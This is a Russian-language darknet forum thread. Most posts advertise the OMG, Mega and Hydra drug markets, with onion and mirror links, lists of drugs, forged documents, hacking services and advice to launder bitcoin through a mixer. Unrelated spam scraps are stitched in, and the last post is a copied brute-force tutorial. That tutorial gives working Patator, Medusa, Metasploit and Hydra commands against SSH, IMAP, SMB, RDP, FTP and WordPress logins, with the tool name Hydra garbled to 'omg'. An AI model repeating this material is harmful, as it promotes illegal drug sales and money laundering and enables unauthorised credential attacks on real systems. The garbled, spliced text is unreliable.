Рамп в телеграмме

Aqoju

Модератор
Подтвержденный
Сообщения
368
Реакции
33
Уважаемые пользователи RuTOR , Все сайты из нашего списка проверены и находятся онлайн, их нет в скам листах. Остерегайтесь фишинг сайтов и помните об уголовной ответственности за незаконные сделки. Подборка официальных сайтов по продаже веществ от форума Rutor носит исключительно информативный характер.

1. OMG!OMG - MOST ADVANCED DARKMARKET

Эта площадка существует довольно давно и в этот период она медленно развивалась в тени гидры. В настоящее время это ведущий сайт по продаже веществ в даркнете.
 

 

2. MEGA - DARKNET MARKET

Благодаря хорошей подготовке и листингу на зарубежных сайтах площадка смогла составить конкуренцию в стабильности и доступности, чего не смогли ее конкуренты, но все же она уступает по полпулярности площадке OMG!OMG!

 

3. HYDRA - Возрождение легенды.

Идут работы по восстановлению всеми любимой гидры, но все не так просто как казалось ранее, совсем скоро она будет доступна, а сейчас нам остается только ждать релиза от команды HYDRA.

 

________________________
RUTOR — Главная торговая и информационная площадка в сети Tor.



Nebajyze

Юзер
Сообщения
108
Реакции
3
Рамп в телеграмме
Вот никак не могут успокоиться мошенники, чтобы не атаковать сайт ОМГ. В данной статье речь пойдет об уводе аккаунтов у доверчивых пользователей. Сотрудничество с Гидрой с каждым годом становится все безопаснее, но все равно, остаются риски потерять свои деньги, несмотря на все меры, принятые администрацией. Мошенники создают копии торговой площадки, где доверчивый клиент, зарегистрировавшись и пополнив баланс, может сразу же найти забыть про свои деньги. Мошенники с Гидры – деньги, рега и увод профиляфото хакера с биткоином гидры Схема работы мошенников, паразитирующих на Гидре, проста как день. Создается левый сайт, «содранный» с Гидры (является точной его копией, но имеющий уникальное доменное имя). Доверчивый клиент, заходит на такой ресурс, регистрируется, пополняет баланс для совершения покупки и все! Деньги на счету мошенника и аккаунт становится недействительным. Вторая и не менее популярная схема – кража аккаунтов. Используя зеркала Гидры (которые предоставлены мошенниками), клиент вводит свой логин и пароль для входа. Злоумышленники копируют персональную информацию клиента, входят самостоятельно с его логином и паролем, а его, в свою очередь, система «кикает» и он не может попасть на сайт. Если даже ему это удастся, он обнаружит, что денег на балансе уже нет. Способов развода много, ведь «паразиты» (а по другому их не назвать), работают по принципу «без лоха, и жизнь плоха». Чтобы не стать очередным неудачником, потерявшим деньги, рекомендуется придерживаться простых правил, о которых поговорим ниже. ОМГ борется с мошенниками – как это проявляется?описание борьбы с мошенниками omg onion Чтобы «прикрыть лавочку» для мошенников и перекрыть им денежный кран, админы торговой площадки omg сделали следующее – полностью отменили вывод денег с сайта. С 2018 года пользователь может только официальный пополнить баланс и оформить покупку. Но и тут мошенники нашли выход! Теперь они воруют аккаунты с положительным балансом (опять же, если пользователь войдет на фишинговый сайт) и продают его. К примеру, если у вас активный профиль, вы сделали несколько покупок, то ваш аккаунт привлекателен с коммерческой точки зрения. Ведь у вас уже будут скидки, есть деньги на счету и ваш профиль «вошел в доверие». Если на вашем балансе будет, условно, 5000 рублей, то он уйдет с молотка за 3500-4000 рублей. Еще один интересный момент! Даже если вы решите купить аккаунт Гидры, вас могут кинуть. Нередко такие «дельцы» выставляют аккаунты на продажу, но после заключения сделки пропадают и блокируют потенциального покупателя. Как поступить, если увели аккаунт на Гидре?изображение погони за хакерами Гидры Потерпев фиаско и потеряв доступ к аккаунту, необходимо сразу связаться с админами Гидры и объяснить им проблему. Они предпримут меры и возможно «спасут» ваши деньги. Второй момент – не стоит паниковать. Чтобы не возникало таких проблем, рекомендуется в настройках профиля подключить двухфакторную аутентификацию. С ней все входы и выходы с сайта ОМГ, покупки и пополнения баланса будут подтверждаться с помощью СМС кодов. Вход на сайт ОМГ необходимо выполнять только через Тор-браузер по оригинальной ссылке (omgruzxpnew4af.onion). По дополнительным вопросам в плане безопасности можно обратиться к подсказкам на omg или почерпнуть инфу с форумов. Ни пуха, ни пера!
 

Usosugon

Местный
Сообщения
54
Реакции
14
Omg onion магазин - драгмаркет нового поколения, работает на всей территории всего бывшего Союза, на данный момент плотно "заселен" дилерами всех районов РФ, доступен 24 часа в сутки, 7 дней в неделю, круглосуточная онлайн-поддержка, авто-гарант, автоматизированные продажи за Киви или BTC.Ссылка на магазин - Зеркало для браузеров без Tor подключенияОбратите внимание! Существует куча фейковых площадок сделанных на домене onion, у настоящего сайта после omgruzxpnew4af идёт слово onion, внимательно проверяйте адрес сайта.Давайте разберем внимательно, что за диковинный исполин о трёх головах:Встречают часто по одёжке, те времена когда магазины в onion были простыми давно канули в лету, ОМГ онион говорит нам Добро пожаловать дорогим удобным дизайном, чувствуется огромная работа, каждый пиксель выверен. Функционал предоставлен огроменный, здесь есть все - регистрация, валюта btc/рубль, товары, магазины, возможность создания приватных сообщений, удобная строка поиска с возможностью выбора своего города. Главная страница магазина нас приветствует огромным списком безопасных магазинов, проверенных временем, в самом низу страницы можно найти раздел новостей, куда постоянно публикуют свежие новости, конечно не такие интересные как у нас :).По заявлению администрации ОМГ тор, сайт полностью написан с нуля, что гарантирует отсутствия частых уязвимостей в безопасности, насколько нам известно код писался ОМГ онион магазина не менее года, "дипмаркет" работает с 2015 года, никаких новостей об утечке данных, взломе, краж биткоинов за все время не было, из чего имеем полное право сделать вывод, что криптомаркет безопасный.Дальше в нашем обзоре будет рассмотрен весь волшебный зверь, но вначале о главном, то что действительно важно для каждого пользователя и потенциального покупателя. Очень важно - товар и цены, сказать, что на Гидре разный товар, это ничего не сказать, в продаже весь спектр документов на все случаи жизни ОСАГО, акцизные марки табака и алкоголя, водительские удостоверения любых стран, дипломы высшего образования, получение гражданства Украины или Молдовы, дебетовые карты любых банков, сим-карты операторов связи России, Азии, Европы, флешки с Tails, схемы заработка, и конечно разнообразные психо-активные вещества, марихуана, амфетамин, героин, бошки, гашиш, a-pvp, mdvp, экстази, грибы, марки, кокаин, мефедрон, полный список смотрите сами на сайте магазина.Ценообразование, нам хотелось бы упомянуть, что цены на omg tor копеечные и всё отдают почти даром, но это не так. Как известно в наш век, хороший товар - дорого стоит, и можно было бы испугаться цен, которые были в самом начале, но подпольная экономика сыграла злую шутку, и новые барыги (новые продавцы), чтобы получить приток клиентов к себе, стали снижать цены на товар до разумных, тем самым начиная демпинговать, принуждая других игроков рынка со временем также понижать стоимость, так как постоянно получить сверхприбыль нельзя. На данный момент, цены на все товары стали вполне сносными, но учитывая постоянный рост аудитории и геометрически увеличивающиеся количество новых голов Гидры, цены претерпят в будущем корректировку, скорее всего рынок будет диктовать правила снижения ценников, для более интересной, конкуретной борьбы за клиентов. Для безопасности покупателей работает система авто-гаранта, как это выглядит? Любая сделка проходящая на сайте, автоматически "страхуется", в случае спорных ситуаций к беседе присоединяется представитель администрации. Из полезных новинок - моментальные покупки, возможность быстро приобрести выбранный товар, без ожидания подтверждения транзакции в blockchain, что весьма удобно, так как транзакция может подтвердиться и через сутки, оплата в битках и qiwi, как в старые добрые времена просто, пополнить баланс личного счета можно даже через Сбербанк! Разумеется доступен предзаказ, но в этом случае уже лучше обсуждать нюансы с продавцом. По словам администрации все магазины проходят проверку, то есть все представленные магазины 100% не обманщики, что само собой разумеется, так как бесплатно на маркете никого размещать не будут, кроме этого администрация проверяет качество работы магазинов контрольными закупками. Внутри встроен мессенджер, аналог ватсапа, у которого даже есть хештеги, ещё бы лайки приделали :), распределение на группы, приватные беседы и многое другое, мы думаем данный функционал гораздо более полезен продавцам для становления "корпоративной" сети. Более всего улыбает система технической поддержки, которая работает в режиме реального времени, в чат можно пригласить модера, для разрешения практически любой спорной ситуации, даже в новый год отвечают довольно быстро, мы проверяли под новый год, как только администратор принял решение, всем участникам беседы приходит об этом сообщение. =) Внутри сайта огромное количество функций, система самоуничтожающихся записок, пользовательские отзывы о всех товарах, система рейтинга, десятибальная шкала оценки маркетов, возможность оставления отзывов после каждой покупки, общий рейтинг продавцов, рейтинг покупателей, отображается количество успешных сделок совершённых продавцом и т.д. и т.п.Итог.omg tor во истину огромный исполин о трёх головах, движение которого крайне трудно определить, у данного сайта нет определённой аудитории, он охватывает все сферы теневого бизнеса, от продажи ПАВ до торговли документами и банковскими картами, географию и объём можно сравнить разве что с eBay, который известен каждому пользователю обычного интернета. Естественно такой огроменный криптомаркет в онионе ярко выделяется и сильно заметен, он манит разносторонную публику и, скорее всего, именно это желание всего и вся может сыграть злую шутку, но ведь для этого у omg на каждое дело своя голова, отсечешь одну вырастут две, как известно, на текущий момент это лидер рынка, за что и занимает первую строчку нашего рейтинга. Что ещё сказать?Сейчас магазин Гидры очень популярен в сети, у неё даже появились зеркала, например, сайты предоставляют своим посетителям быстрый вход на сайт магазина. Проект ОМГ в онион расположен, обязательно сверяйте адрес ссылки куда заходите, вот 100% рабочая и верная ссылка.Что как то слишком грамотно получилось, такое даже у меня ощущение, что статья заказная, слишком всё хорошо не бывает, ложка дёгтя должна где то быть, и ложка дёгтя есть в том, что проект новый, крайне наглый, сайту менее четырех лет, хоть он и развивается семимильными шагами, но что будет в будущем покажет только время.
Рамп в телеграмме
 
G

Gitikoni

Пассажир
Сообщения
92
Реакции
3
After the General Assembly meeting that included the Elections of the New Board of Directors of the Society of Kastorians “OMONOIA”, NY we thank you for your continuous support! Great things are coming! Stay tuned! Standing from left: Sophia Vourdoukis-Capuano, John Papazoglou, Anastasios Manaris, Andreas Vassiliou, Katerina Sachinidou, Panos Politidis, George Jimas, & George Andreopoulos […]Read More...
 

Ywuhuqoh

Пассажир
Сообщения
81
Реакции
1
SUGAR 糖果手機-台灣官網Togglenavigation首頁產品SUGAR全系列手機SUGAR周邊配件客戶服務常見問題服務據點銷售通路售後服務網路商店關於SUGAR施華洛世奇ZirconiaSUGAR 糖果手機-台灣官網Togglenavigation首頁產品SUGAR全系列手機SUGAR周邊配件客戶服務常見問題服務據點銷售通路售後服務網路商店關於SUGAR施華洛世奇Zirconia SUGAR糖果手機 法國品牌設計 | 引領手機界的時尚尖端立即購買SUGARC606.82吋大螢幕 6000大電量SUGARS55滿眼盡視你SUGART35FUN電無敵 享樂隨行COPYRIGHT © 2020 年SUGAR TAIWAN 版權所有 隱私權政策 人才招募安全性問題回報TOP
 

Zarimop

Пассажир
Сообщения
94
Реакции
21
Ссылка на ОМГ сайт зеркало – omg2web.cmСсылка на ОМГ через Tor: omgrulqno4hoio.onionДоброе веремени суток, уважаемые посетители данной статьи, если вы искали офицальный магазин omg, то вы в подходящем месте!Тут размещены все доступные рабочие зеркала на ваш любимый магазин, также мы расскажем вам немного о работе и его политики, а ещё вы вооружитесь полезными ссылками как на мануалы и туториалы, так и на актуальные ссылки сайта ОМГ.Актуальные настоящие зеркала на криптомагазин ОМГВ настоящее время очень важно иметь официальные ссылки на сайт мгновенных покупок, потому-что уже сегодня существует невероятное количество фейков нашего магазина и различных мошенников, только на настоящей omg вы будете в безопасности. Следовательно, мы рекомендуем воспользоваться данной статье и сохранить себе все нужные для вас ссылки.
Всё необходимое это отметить их в избранное/любимое в вашем браузере и все, вы станете вооружены и не дадите шанс мошенникам.Возможно вы когда-нибудь слышали о существование или может быть вы знали о таких доменах гидры как .onion, это специальные домены которые работают только на отдельном браузере. Для того чтобы их использовать вам необходимо скачать Tor browser по ссылке и наслаждаться безопасным и надежным посещением криптомаркета ОМГ.
Подробнее вы можете об этом прочесть по этому мануалуМагазин наркотиков, черный маркет ОМГНе секрет, что наш магазин предлагает своим посетителям разные наркотические вещества – это наша специализация, вы можете у нас приобрести: шишки, марихуану, бошки, траву, мефедрон, лсд, героин, кокаин, различные таблетки по типу экстази, скорости, мдма, мда, амфетамин, метадон и много-многое другое, данный список может продолжаться огромное количество времени, также к вашим услугам различные нелегальные задачи, вы можете заказать в маркете такие услуги как по типу: подделка документов, взлом аккаунта в интернете, можно даже пробить нужные вам номера, сделать зеркальные документы и так далее.Также на сайте есть уникальная возможность при заказе выбрать нужный район где будет сделать прикоп, почти все магазины на сайте уже пользуются этой системой, так как это очень удобно для клиентов. Также в темном маркетплейсе действует гарант, который не позволит продавцам каким-либо образом обмануть своего покупателя, он служит для справедливости и рейтинга самих продавцов, работает от таким образом – продавец не получит оплаченные вами деньги за товар, пока вы не подтвердите наход закладки!omg – темний шоппингDarknet omg shop – самый популярный и большой магазин на всей России, мы захватили всю страну своми наркотическими веществами, о нас знают все, но не все могут нас найти.
Дело в том, что как уже упоминало, мы имеем тысячи паразитов нашего сайта, а неопытные пользователи не знают как нас гуглить в сети и попадаются в лапы мошенникам. Чтобы это предотвратить мы на официальном сайте выложили статью по всем нашим зеркалами и ссылками, так чтобы вы всегда могли зайти на ваш любимимую черную торговую площадку и совершить необходимые покупки. Ссылка на статью со списком официальных доменов.Теги:магазин наркоты, купить закладку, даркент магазин, омг криптомагазин
 

Iviganyp

Пассажир
Сообщения
65
Реакции
24

omg shop – магазин моментальных покупокОМГ онион (omg onion) – это самая популярная площадка запрещенных товаров в „черной“ сети (Draknet). Данный магазин в основном ведет свою деятельность в Tor browser, так как он является безопасным браузером и всвязи с тем, что товар которым торгуют на omg shop является незаконным, данный браузер идеально к нему подходит. Tor browser работает через vpn постоянно, поэтому это позволяет сохранять полную анонимность для каждого пользователя сайта омг. Также, на сайте работает двухфакторное шифрование, для тех кто не хочет разбираться с тор браузером. С обычного браузера вы тоже можете попасть и с помощью алгоритмов защиты, вы останетесь незаметным, но для полной конфиденциальности рекомендуем использовать Tor.
ОМГ полностью безопасна, они тщательно относятся к конфиденциальности каждого клиента, основная проблема omg shop является то, что проблематично найти официальную ссылку сайта омг, для этого вы публикуем зеркала на сайт омг, которые мы рекомендуем вам сохранить к себе в избранное.Официальные зеркала для обычных браузеровСсылки омг онион для тор браузераМагазин моментальных покупок постоянно прогрессирует и уже сегодня омг работает по таким странам: Россия, Беларусь, Украины, Казахстана. Мы расширяемся и планируем расти дальше.Популярные города: Краснодар, Санкт-Петербург, Минск, Казань, Астрахань, Томск, Астана, Пермь, Киев, Харьков, Москва, Ростов-на-Дону, Иркутск, Тамбов, Нурсултан, Красноярск, Владивосток.
Темный магазин работает по принципы автоматических продаж, вы можете приобрести то, что пожелаете в любое время суток и не нужно ждать продавца.
Есть гарант продаж, в виде того, что продавец не получить оплаченные вами средства, пока вы лично не подтвердите „наход“ закладки. На omg работает техническая поддержка круглосуточно, поэтому по всем интересующим вопросам на тему Гидры, вы можете обратиться к ним. Вам обязательно помогут и в случае если у вас какие-то проблемы с „находом“ или вы считаете, что вам продали товар плохого качества – напишите в тех поддержку, они решат ваш спор и предложат варианты развития данной ситуации.Первые покупки на сайте омгСайт ОМГ работает через такую валюту как – биткоин. Для того чтобы перейти к покупкам вам необходимо пройти короткую регистрацию и пополнить свой личный счет криптовалютой. Одной из особенностей является то, что переводу для гидры не требует подтверждения blockchain.
В „темном магазине“, вы можете приобрести: траву, бошки, шишки, мефедрон, гашиш, амфетамин, лсд, мдма, кокс, экстази, омгпоника и многое другое. omg ещё предлагает своим клиента различные запрещенные услуги, по типу: подделка документов, взлом почты, соц. сетей и тому подобное.Также, из-за того, что мы постоянно растем, уже сегодня мы можем предложить вам уникальную возможность выбрать район в котором будет сделан клад. Вы можете использовать данную функцию в целях удобства или же наоборот, отведения внимания, заказ товар в другом районе, выбирать вам.
Для пополнения личного счета аккаунта на гидре, мы рекомендуем вам использовать „чистые“ криптомонеты, чтобы повысить процент анонимности и вас никто не смог отследить, мы рекомендуем сервис по очистке биткоинов, биткоин миксер – BitMix.Это популярный сервис в даркнете, у него огромный опыт работы с клиентами и большой резерв криптовалюты.Данная прачечная биткоинов, также работает в черной сети и базируется в Tor браузере, но есть ссылки и для обычных браузеров, мы с вами поделимся ссылками данного сервиса, чтобы вы смогли как следует позаботиться о своей анонимности.Для вас существует такой сайт как „Рейтинг биткоин миксеров – Топ 10 миксеры криптовалюты“, в котором расположен рейтинг всех популярных и надежных биткоин миксеров, в виде топа сервисов по очистке криптовалюты. А также отзывы и обзор биткоин миксеров, принцип их работы, их плюсы и минусыТеги: Биткоин миксер, топ биткоин миксеров, рейтинг миксеры криптовалюты, отмывка криптовалюты, очистка биткоинов, bitcoin mixer, bitcoin tumbler, bitcoin blender, clean tainted bitcoins, best bitcoin mixer, bitcoin mixing service with lowest feeОфициальный сайт омг 2021Хотим предупредить вас о том, что в сети полно фейков сайта омг, поэтому пользуйтесь только официальными ссылками на омг магазин. Также, проверяйте правильность адресов, тем более при пополнении счета. Это сегодня самый актуальный вопрос для нас, будьте осторожны.Бывает ещё так, что наши сайты недоступны и возможно находятся под атакой злоумышленников, в таком случае вы можете просто перейти на зеркало веб-сайта ОМГ.Сохраните данный список к себе в избранное и удачных покупок, проверяйте url адреса и будьте внимательнее.
 

Vehoty

Пассажир
Сообщения
39
Реакции
17
Brute-force (атака полным перебором) обычно используется в контексте хакерских атак, когда злоумышленник пытается подобрать логин/пароль к какой-либо учетной записи или сервису. Рассмотрим инструменты, которые можно использовать для выполнения атак методом перебора: omg 8.6, Medusa 2.2, Patator 0.7 и Metasploit Framework 4.17.17-dev, входящие в состав Kali Linux 2019.1. В зависимости от поддерживаемых протоколов будем использовать наиболее подходящие инструменты. Словарь паролей и пользователей сгенерируем самостоятельно с использованием Crunch.Информация предназначена исключительно для ознакомления. Не нарушайте законодательство.CrunchСловарь с пользователями мы взяли небольшой и записали в него 4 пользователя.Для составления словаря используется Crunch, как встроенное средство. Инструмент гибкий и может составить словарь по определенной маске. Если есть вероятность того, что пользователь может использовать словарный пароль, то лучше воспользоваться уже готовыми решениями, тем более, что, как показывает практика, самый популярный пароль – 123456.Генерировать словарь будем на 5 символов по маске. Данный метод подходит для случаев, когда мы имеем представление о структуре пароля пользователя.crunch 5 5 qwe ASD 1234567890 -t @@,%@ -o /root/wordlist.txt5 – минимальное и максимальное количество символов;
qwe, ASD, 1234567890 – используемые символы;
-t – ключ, после которого указывается маска для составления пароля;
@ – нижний регистр;
, – верхний регистр;
% – цифры.Сразу отметим, что на первых этапах мы будем для каждого инструмента описывать используемые ключи, но далее те же самые ключи уже не будут рассматриваться подробно, поскольку они крайне похожи друг на друга, а значит, имеют аналогичный синтаксис.Patatorpatator ssh_login host=192.168.60.50 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:mesg=’Authentication failed’ssh_login – модуль;
host – наша цель;
user – логин пользователя, к которому подбирается пароль или файл с логинами для множественного подбора;
password – словарь с паролями;
-x ignore:mesg=’Authentication failed’ – не выводить на экран строку, имеющую данное сообщение. Параметр фильтрации подбирается индивидуально.Все инструменты мы тестируем с количеством потоков по умолчанию, никаким образом их количество не изменяем.
Patator справился ровно за 7 минут 37 секунд, перебрав 2235 вариантов.omgomg -f -L /root/username -P /root/wordlist.txt ssh://192.168.60.50-f – остановка перебора после успешного подбора пары логин/пароль;
-L/-P – путь до словаря с пользователями/паролями;
ssh://IP-адрес – указание сервиса и IP-адреса жертвы.omg затратила на перебор 9 минут 11 секунд.Medusamedusa -h 192.168.60.50 -U /root/username -P /root/wordlist.txt -M ssh-h – IP-адрес целевой машины;
-U/-P – путь к словарям логинов/паролей;
-М – выбор нужного модуля.Medusa за 25 минут обработала только 715 комбинаций логин/пароль, поэтому данный инструмент не лучший выбор в случае с брутфорсом SSH.MetasploitПроизведем поиск инструмента для проведения brute-force атаки по SSH:
search ssh_loginЗадействуем модуль:
use auxiliary/scanner/ssh/ssh_loginДля просмотра необходимых параметров воспользуемся командой «show options». Для нас это:
rhosts – IP-адрес жертвы;
rport – порт;
user_file – путь до словаря с логинами;
pass_file – путь до словаря c паролями;
stop_on_success – остановка, как только найдется пара логин/пароль.По умолчанию Metasploit использует 1 поток, поэтому и скорость перебора с использованием этого модуля очень низкая. За 25 минут так и не удалось подобрать пароль.Patatorpatator imap_login host=192.168.100.109 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:code=1imap_login – используемый модуль;
-x – параметр, который помогает фильтровать ответы от Patator. В данном случае игнорируем ответы с кодом 1.Параметр х является уникальным для каждого конкретного случая, поэтому рекомендуется сначала запустить инструмент без него и посмотреть какие ответы в основном приходят, чтобы затем их игнорировать.В итоге Patator смог подобрать пароль за 9 минут 28 секунд, что является практически тем же самым показателем, что и в случае с SSH.omgomg -f imap://192.168.60.50 -L /root/username -P /root/wordlist.txtomg справилась за 10 минут 47 секунд, что довольно неплохо.MedusaВ связи с тем, что на сервере использовался самоподписанный сертификат, Medusa выдавала ошибку, исправить которую настройками инструмента не удалось.MetasploitВ Metasploit не удалось подобрать подходящий модуль для брутфорса IMAP.SMBPatatorПри использовании Patator появилось большое количество ложных срабатываний.omgomg -L /root/username -P /root/wordlist.txt 192.168.60.50 smbБлагодаря своим алгоритмам omg справилась с задачей всего за 5 секунд.Medusamedusa -h 192.168.60.50 -U /root/username -P /root/wordlist.txt -M smbntЗапуская перебор, я ожидал результатов, схожих с предыдущими, но на этот раз Medusa меня приятно удивила, отработав за считанные секунды.MetasploitС помощью поиска search smb_login находим нужный модуль scanner/smb/smb_login и применяем его.Необходимо указать параметры:
RHOSTS – IP-адрес жертвы;
USER_FILE – словарь с пользователями;
PASS_FILE – словарь с паролями;
STOP_ON_SUCCESS – остановка после подобранной пары логин/пароль.Metasploit справился с задачей за 1 минуту.RDPPatatorpatator rdp_login host=192.168.60.50 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:code=132К сожалению, на данный момент из тестируемых инструментов только Patator может подбирать логин/пароль для RDP-протокола. При этом, даже если Patator и справился с поставленной задачей, в выводе дополнительно появилось ложное срабатывание.WEBДля начала нам необходимо понять, как происходит процесс аутентификации.
Для этого нужно отправить тестовые запросы аутентификации и уже из поведения веб-приложения можно будет увидеть, что неверный пароль возвращает код ответа 200, а успешная аутентификация — 302. На эту информацию и будем опираться.PatatorУчитывая ответы веб-приложения на тестовые запросы, составим команду для запуска Patator:patator http_fuzz url=http://site.test.lan/wp-login.php method=POST body='log=FILE0&pwd=FILE1&wp-submit=Log+In&redirect_to=http%3A%2F%2Fsite.test.lan%2Fwp-admin%2F&testcookie=1' 0=/root/username 1=/root/wordlist.txt before_urls=http://site.test.lan/wp-login.php -x ignore:code=200 accept_cookie=1http_fuzz – модуль для brute-force атаки HTTP;
url – адрес страницы с аутентификацией;
FILE0 – путь до словаря с паролями;
body – информация, которая передается в POST запросе при аутентификацией;
-x – в данном случае мы указали команду не выводить на экран сообщения, содержащие параметр с кодом 200;
accept_cookie – сохранение параметра cookie и передачи его в следующий запрос;
Итог — нам удалось подобрать пароль чуть менее, чем за 30 секунд, что очень быстро.omgКак мы уже знаем, при неверной аутентификации возвращается код 200, а при успешной — 302. Воспользуемся этой информацией и выполним команду:omg -f -L /root/username -P /root/wordlist.txt http-post-form://site.test.lan -m "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fsite.test.lan%2Fwp-admin%2F&testcookie=1:S=302"Здесь мы указываем обязательные параметры:
-f – завершить перебор после получения валидной пары логин/пароль;
-L – словарь с пользователями;
-P – словарь с паролями;
http-post-form – тип формы (в нашем случае POST);
/wp-login.php – URL страницы с аутентификацией;
^USER^ – показывает куда подставлять имя пользователя;
^PASS^ – показывает куда подставлять пароль из словаря;
S=302 – указание на какой ответ опираться omg (в нашем случае — ответ 302 при успешной аутентификации).Успех ожидал нас уже через 3 минуты 15 секунд.Medusamedusa -h site.test.lan -U /root/username -P /root/wordlist.txt -M web-form -m FORM:"/wp-login.php" -m FORM-DATA:"post?log=&pwd=&wp-submit=Log+In&redirect_to=http%3A%2F%2Fsite.test.lan%2Fwp-admin%2F&testcookie=1"К сожалению, при попытках перебора пароля Medusa выдает ошибку «Segmentation fault».MetasploitС помощью поиска search wordpress_login находим нужный модуль auxiliary/scanner/http/wordpress_login_enum и применяем его. Необходимо указать параметры:
PASS_FILE – словарь с паролями;
RHOSTS – адрес жертвы;
STOP_ON_SUCCESS – остановка после подобранной пары логин/пароль;
USER_FILE – словарь с пользователями;
VALIDATE_USERS – отключить проверку существования учетной записи пользователя;
VERBOSE – отключить лишний вывод;
VHOST – доменное имя атакуемого сайта.
Затраченное время — 32 секунды.FTPPatatorpatator ftp_login host=192.168.60.50 user=FILE0 password=FILE1 0=/root/username 1=/root/wordlist.txt -x ignore:code=530В данном модуле Patator работает уже медленнее, чем с Web-формами, а пароль был подобран за 11 минут 20 секунд.omgomg -f -L /root/username -P /root/wordlist.txt ftp://192.168.60.50Работая по умолчанию в 16 потоков, omg смогла перебрать пароли за 7 минут 55 секунд.Metasploit, MedusaВ Metasploit используем модуль auxiliary/scanner/ftp/ftp_loginВ случае с Medusa запрос выглядит следующим образом:
medusa -f -M ftp -U /root/username -P /root/wordlist.txt -h 192.168.60.50Все параметры стандартные, указываем путь до словарей и обязательно ставим завершение перебора после найденной пары логин/пароль.
С этим протоколом, как и c SSH, Metasploit и Medusa плохо справляются при стандартном количестве потоков. Поэтому если есть желание использовать именно эти инструменты, то необходимо вручную увеличивать количество потоков. Но и тут не все так просто. В однопоточном режиме FTP-сервер при использовании этих инструментов, сбросил соединение, чего не наблюдалось при использовании Patator или omg. Поэтому есть вероятность, что увеличение количества потоков не изменит ситуацию.Заключение.Протестировав разные, но в то же время похожие инструменты на различных сервисах, можно сказать, что у каждого из них есть как достоинства, так и недостатки, а с каким инструментом работать — решать только вам.Ниже представлена сводная таблица с полученными результатами:P.S. Потренироваться можно в наших лабораториях lab.pentestit.ru.
 

Похожие темы

  • Ymyro
  • 18 Июл 2021, 21:47
  • Digizak
  • 18 Июл 2021, 13:16
  • Awapahan
  • 18 Июл 2021, 13:07
Сверху Снизу